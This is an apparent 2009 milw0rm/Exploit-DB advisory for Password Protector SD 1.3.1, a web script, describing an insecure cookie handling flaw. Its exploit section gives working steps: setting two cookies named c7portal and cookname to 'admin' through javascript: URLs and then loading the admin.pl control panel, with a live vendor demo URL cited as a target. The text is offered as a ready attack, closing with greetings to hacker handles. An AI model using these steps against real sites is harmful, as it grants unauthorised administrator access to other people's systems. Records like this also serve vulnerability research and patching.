Password Protector SD 1.3.1 - Insecure Cookie Handling

EDB-ID:

8668




Platform:

PHP

Date:

2009-05-13


=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script : Password Protector SD v1.3.1 Insecure Cookie Handling Vulnerability

[+] Found by : Mr.tro0oqy  
   
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
--------
step 1 [add]: javascript:document.cookie="c7portal=admin;path=/";

step 2 [add]: javascript:document.cookie="cookname=admin;path=/";

step 3 [to login] : http://localhost/cgi-bin/ppSD/admin.pl?L=home


in control panel : 

http://www.passwordprotectorsd.com/cgi-bin/ppSD/admin.pl?L=home


demo:
-----
http://www.passwordprotectorsd.com/cgi-bin/c7/admin.pl

=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
ThE g0bL!N - spyboy - red virus - virus_hima - Red-D3v1L
Cyb3r-DeViL- OXIDE

all my Friends

# milw0rm.com [2009-05-13]